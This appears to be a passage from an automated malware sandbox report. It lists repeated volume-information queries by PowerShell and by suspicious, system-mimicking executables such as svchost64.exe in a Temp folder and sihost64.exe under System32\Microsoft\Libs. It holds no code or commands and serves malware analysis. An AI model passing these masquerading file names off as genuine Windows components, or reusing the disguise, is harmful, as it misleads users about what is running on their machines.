                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\services64.exeQueries volume information: C:\Windows\System32\services64.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeQueries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeQueries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
